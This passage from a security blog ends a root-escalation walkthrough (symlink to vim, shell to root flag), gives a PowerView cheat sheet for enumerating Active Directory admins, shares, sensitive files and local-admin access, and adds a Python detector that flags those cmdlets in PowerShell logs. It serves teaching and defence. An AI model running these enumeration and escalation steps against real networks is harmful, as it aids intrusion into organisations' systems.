Because <i>tail </i>now resolves to <i>vim</i>, this opens <i><b><span style="font-family: courier;">check_syslog.sh</span></b></i> in the <b><i>vim </i>editor</b>:</div><div><br /></div></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4OlJnzsE2jxDlALMR7e8AlHhkuCzLoIGRxy3jVVLntoI2przqbfN3G26LG80IdaDm3A1LazkLTVUcYwbYhsogZazkkyhvrrRzSjiM2FBBq7e_qrVBRenm7hjfo2wVdx_wt2vKvqL7ujw/s684/symlink+execution+1.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="78" data-original-width="684" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4OlJnzsE2jxDlALMR7e8AlHhkuCzLoIGRxy3jVVLntoI2przqbfN3G26LG80IdaDm3A1LazkLTVUcYwbYhsogZazkkyhvrrRzSjiM2FBBq7e_qrVBRenm7hjfo2wVdx_wt2vKvqL7ujw/w666-h72/symlink+execution+1.png" width="666" /></a></div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTTIXAQf08CFLcX2HFBB9I0VPc-qJSCl5YhNpSg3LnPqilngv3ZT2lF8B6LLILbVNGzGX2qMb6DWyqOC4RoGOfJWfYzQu8duDOiX96_Pci1dxiBLUwyl7BVV5KjtvzjPwk6EfpibRcgJk/s556/vim+editor+mode.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="103" data-original-width="556" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTTIXAQf08CFLcX2HFBB9I0VPc-qJSCl5YhNpSg3LnPqilngv3ZT2lF8B6LLILbVNGzGX2qMb6DWyqOC4RoGOfJWfYzQu8duDOiX96_Pci1dxiBLUwyl7BVV5KjtvzjPwk6EfpibRcgJk/w664-h118/vim+editor+mode.png" width="664" /></a></div><div><br /></div><div><div>Spawning <b><i><span style="font-family: courier;">/bin/bash</span> </i></b>from <i><span style="font-family: courier;">vim </span></i>lands us in a <b>root </b>shell:</div><div><br /></div></div><div><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoxV7rApAi9CANphkh6H9pR9vRW1v0yAmgekAxRP3bo3TrwCHelsZWbzLNB56PXWG2j2MVVYZhENzDPacHxkhB8MCDWW-2tXKi63SZaSqUBerEfVq-ayQdmtr7zSiYnzaA9ywSULaPBZg/s950/root+gained.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="362" data-original-width="950" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoxV7rApAi9CANphkh6H9pR9vRW1v0yAmgekAxRP3bo3TrwCHelsZWbzLNB56PXWG2j2MVVYZhENzDPacHxkhB8MCDWW-2tXKi63SZaSqUBerEfVq-ayQdmtr7zSiYnzaA9ywSULaPBZg/w665-h244/root+gained.png" width="665" /></a></div><div><br /></div><div><div>Voila! Now, let's move ahead and hunt for the root flag:</div><div><br /></div></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTblImqmAeY4DWbhjS16eXjb-ItSOMB1vA7fiwDUwZNgxziefqgH-u5O2rDP5zmqjg9ksuY5wutRqIzOYNQ9SRfXgdLfI2kDzjGobZ2fGIkZ4lzxvALa2es-M34-kMBqnQRqOCjkYRbHM/s688/root+flag.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="574" data-original-width="688" height="534" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTblImqmAeY4DWbhjS16eXjb-ItSOMB1vA7fiwDUwZNgxziefqgH-u5O2rDP5zmqjg9ksuY5wutRqIzOYNQ9SRfXgdLfI2kDzjGobZ2fGIkZ4lzxvALa2es-M34-kMBqnQRqOCjkYRbHM/w640-h534/root+flag.png" width="640" /></a></div><div><br /></div><div><div style="text-align: center;"><b><i><span style="font-family: verdana;"><br /></span></i></b></div><div style="text-align: center;"><b><i><span style="font-family: verdana;">Awesome technique always gives awesome result!</span></i></b></div></div><div><br /></div><p>Author: Akshay Pandurngi</p><p><b>Domain Enumeration Cheatsheet</b> (published 2020-08-19)</p><div><p><span style="font-family: inherit;">In this post, 
I am going to share a cheatsheet which you can use while doing domain enumeration in an Active Directory environment. Let's begin.<br /></span></p><div><span style="font-family: inherit;">Always enumerate the following first:</span></div><ol><li><div><span style="font-family: inherit;">Users</span></div></li><li><div><span style="font-family: inherit;">Computers</span></div></li><li><div><span style="font-family: inherit;">Domain Administrators</span></div></li><li><div><span style="font-family: inherit;">Enterprise Administrators</span></div></li><li><div><span style="font-family: inherit;">Shares</span></div></li></ol><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">[*] Import PowerView</span></div><div><span style="font-family: inherit;"><a href="https://github.com/PowerShellMafia/PowerSploit">https://github.com/PowerShellMafia/PowerSploit</a></span></div><div><span style="font-family: inherit;"><br /></span></div><p>[*] Get current domain</p><ol><li><b><i>Get-NetDomain</i></b></li></ol><p>[*] Get object of another domain</p><ol><li><b><i>Get-NetDomain -Domain test.dc.com</i></b></li></ol><p>[*] Get domain SID for the current domain</p><ol><li><b><i>Get-DomainSID</i></b></li></ol><p>[*] Get domain policy for the current domain</p><ol><li><b><i>Get-DomainPolicy</i></b></li><li><b><i>(Get-DomainPolicy)."system access"</i></b></li></ol><p>[*] Get Domain Controllers for the current domain</p><ol><li><b><i>Get-NetDomainController</i></b></li></ol><p>[*] Get a list of users in the current domain</p><ol><li><b><i>Get-NetUser</i></b></li></ol><p>[*] Get a list of all properties for users in the current domain</p><ol><li><b><i>Get-UserProperty</i></b></li><li><b><i>Get-UserProperty -Properties pwdlastset</i></b></li><li><b><i>Get-UserProperty -Properties logoncount</i></b></li><li><b><i>Get-UserProperty -Properties badpwdcount</i></b></li></ol></div><div>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Search for a particular string in a user's attributes:</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"> </span><b><i><span style="font-size: 12pt;">Find-UserField -SearchField Description -SearchTerm "built"</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get a list of computers in the current domain</span><span style="font-size: 12pt;"></span></span></p>
<span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;"><span style="font-size: 12pt;"><span style="mso-list: Ignore;">1.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetComputer</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">2.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetComputer -Ping</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">3.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetComputer -OperatingSystem "*Server 2012*"</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">4.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; 
font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetComputer -FullData</span></i></b><span style="font-size: 12pt;"></span><br /></span></div><div>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get a list of groups in the current domain</span><span style="font-size: 12pt;"></span></span></p>
<span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;"><span style="font-size: 12pt;"><span style="mso-list: Ignore;">1.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetGroup</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">2.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetGroup -FullData</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">3.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetGroup 'Domain Admins'
-FullData</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">4.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetGroup *admin*</span></i></b><span style="font-size: 12pt;"></span><br /></span></div><div>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get all the members of the Domain Admins group</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"> </span><b><i><span style="font-size: 12pt;">Get-NetGroupMember -GroupName "Domain Admins" -Recurse</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get the group membership for a user</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"> </span><b><i><span style="font-size: 12pt;">Get-NetGroup -Username "Thanos"</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] List all the local groups on the machine</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"> </span><b><i><span style="font-size: 12pt;">Get-NetLocalGroup -ComputerName WIN-8542F7P0C5H.dc.com -ListGroups</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Find shares on hosts in current domain</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"> </span><b><i><span style="font-size: 12pt;">Invoke-ShareFinder
-Verbose</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Find sensitive files on computers in the doman<br style="mso-special-character: line-break;" />
</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1. <b><i>Invoke-FileFinder -Verbose</i></b></span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><b><i><span style="font-size: 12pt;"> </span></i></b><span style="font-size: 12pt;"><br />
<br />
[*] Get all fileservers of the domain<br />
<br />
1.<b><i> Get-NetFileServer</i></b></span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get list of GPO in the current domain<br />
<br />
1. <b><i>Get-NetGPO</i></b><br />
2. <b><i>Get-NetGPO | select displayname</i></b><br />
3. <b><i>Get-NetGPO -ComputerName test.dc.com</i></b><br />
<br />
<br />
[*] Get list of OU in the current domain<br />
<br />
1. <b><i>Get-NetOU</i></b><br />
2. <b><i>Get_NetOU -FullData</i></b><br />
<br />
<br />
[*] Get GPO applied on an OU. Read GPOname from gplink attribute from
Get-NetOU<br />
<br />
1.<i><b> </b></i><b><i>Get-NetGPO -GPOname '{6AC1786C-016F-11D2-945F-00C04fB984F9}'</i></b><br />
<br />
<br />
[*] Get a list of all domain trust for the current domain<br style="mso-special-character: line-break;" />
</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.<i><b> </b></i><b><i>Get-NetDomainTrust</i></b><br />
2. <b><i>Get-NetDomainTrust -Domain child.dc.com</i></b><br />
<br />
<br />
[*] Get details about the current forest<br style="mso-special-character: line-break;" />
</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1. <b><i>Get-NetForest</i></b><br />
2. <b><i>Get-Forest -Forest dc1.com<br />
</i></b> <br />
<br />
[*] Get all domains in the current forest<br />
<br />
1. <b><i>Get-NetForestDomain</i></b><br />
2. <b><i>Get-NetForestDomain -Forest dc1.com</i></b><br />
<br />
<br />
[*] Map trusts of a forest<br />
<br />
1. <b><i>Get-NetForestTrust</i></b><br />
2. <b><i>Get-NetForestTrust -Forest dc1.com</i></b><br />
<br />
<br />
[*] Find all machines on the current domain where the current user has
local admin access<br />
<br />
1. <b><i>Find-LocalAdminAccess -Verbose</i></b><br />
<br />
<br />
[*] Find local admins on all machines of the domain<br />
<br />
1. <b><i>Invoke-EnumerateLocalAdmin -Verbose</i></b><br />
<br />
<br />
[*] Find computers where a domain admin has sessions<br />
<br />
1. <b><i>Invoke-UserHunter</i></b><br />
2. <b><i>Invoke-UserHunter -GroupName "RDPUsers"</i></b></span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal"><span style="font-family: inherit;"> </span></p><p class="MsoNormal"><span style="font-family: inherit;">Do share if you like the post. Happy Hacking! 😊 <br /></span></p>
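<p>The cheat sheet above is the attacker's side of the picture; the same cmdlet names are also what a defender looks for. As an added example (not from this post and not part of PowerView), here is a small Python triage script that runs the cmdlet list over PowerShell script block log entries (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, which requires script block logging to be enabled) and flags a user who chains several enumeration categories in one session. The events, user names and host names are constructed samples, and the category grouping and the "three categories = recon chain" threshold are my own assumptions. Newer PowerView releases renamed most cmdlets (Get-DomainUser, Get-DomainComputer, and so on), so a production version of this list would need those names added.</p>

```python
"""Flag PowerView-style Active Directory enumeration in PowerShell script block logs.

Added example, not from the post. The cmdlet names are those in the cheat sheet;
the 4104 events below are constructed samples, not real telemetry.
"""
import re
from collections import defaultdict

# PowerView cmdlets from the cheat sheet, grouped by what they enumerate
# (grouping is an assumption made for triage, not a PowerView concept).
POWERVIEW_CMDLETS = {
    "domain":   ["Get-NetDomainController", "Get-NetDomainTrust", "Get-NetForest",
                 "Get-NetForestDomain", "Get-NetForestTrust"],
    "user":     ["Get-NetUser", "Get-UserProperty", "Find-UserField"],
    "computer": ["Get-NetComputer", "Get-NetFileServer"],
    "group":    ["Get-NetGroup", "Get-NetGroupMember", "Get-NetLocalGroup"],
    "policy":   ["Get-NetGPO", "Get-NetOU"],
    "share":    ["Invoke-ShareFinder", "Invoke-FileFinder"],
    "lateral":  ["Find-LocalAdminAccess", "Invoke-EnumerateLocalAdmin", "Invoke-UserHunter"],
}
CATEGORY_OF = {n.lower(): cat for cat, names in POWERVIEW_CMDLETS.items() for n in names}
CANONICAL = {n.lower(): n for names in POWERVIEW_CMDLETS.values() for n in names}

# Longest names first so Get-NetGroupMember is not reported as Get-NetGroup;
# PowerShell is case-insensitive, so the match is too.
CMDLET_RE = re.compile(
    r"\b(" + "|".join(re.escape(n) for n in sorted(CANONICAL.values(), key=len, reverse=True)) + r")\b",
    re.IGNORECASE,
)

# Constructed sample of 4104 events (user + ScriptBlockText); hypothetical users and hosts.
SAMPLE_4104 = [
    {"user": "CORP\\jdoe",       "script": "Get-ChildItem C:\\Temp | Measure-Object"},
    {"user": "CORP\\svc_backup", "script": "Import-Module .\\PowerView.ps1; Get-NetDomainController"},
    {"user": "CORP\\svc_backup", "script": "Get-NetUser | select samaccountname"},
    {"user": "CORP\\svc_backup", "script": "get-netgroupmember -GroupName 'Domain Admins' -Recurse"},
    {"user": "CORP\\svc_backup", "script": "Invoke-ShareFinder -Verbose"},
    {"user": "CORP\\helpdesk",   "script": "Get-ADUser -Identity jdoe"},  # RSAT cmdlet, not PowerView
    {"user": "CORP\\auditor",    "script": "Get-NetGPO | select displayname"},
]


def find_cmdlets(script_text):
    """Return the PowerView cmdlet names found in one script block, in canonical casing."""
    return [CANONICAL[m.group(1).lower()] for m in CMDLET_RE.finditer(script_text)]


def triage(events, chain_threshold=3):
    """Group events by user and classify each user as 'clean' (no hits), 'single'
    (fewer than chain_threshold recon categories, worth a look) or 'recon-chain'
    (domain -> users -> groups -> shares style enumeration, as in the cheat sheet)."""
    per_user = defaultdict(lambda: {"cmdlets": [], "categories": set()})
    for ev in events:
        hits = find_cmdlets(ev["script"])
        per_user[ev["user"]]["cmdlets"].extend(hits)
        per_user[ev["user"]]["categories"].update(CATEGORY_OF[h.lower()] for h in hits)

    report = {}
    for user, data in per_user.items():
        cats = sorted(data["categories"])
        if not cats:
            verdict = "clean"
        elif len(cats) >= chain_threshold:
            verdict = "recon-chain"
        else:
            verdict = "single"
        report[user] = {"cmdlets": data["cmdlets"], "categories": cats, "verdict": verdict}
    return report


if __name__ == "__main__":
    for user, r in triage(SAMPLE_4104).items():
        print(f"{user:18} {r['verdict']:12} {', '.join(r['cmdlets']) or '-'}")
```

<p>Matching on cmdlet names is the cheapest signal and is trivially evaded by renaming, so treat a "single" hit as a prompt to look at the rest of that user's 4104 stream rather than as a verdict; the value of the "recon-chain" rule is that the sequence of categories, not any one cmdlet, is what an operator following a sheet like this one produces.</p>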
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="376">
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
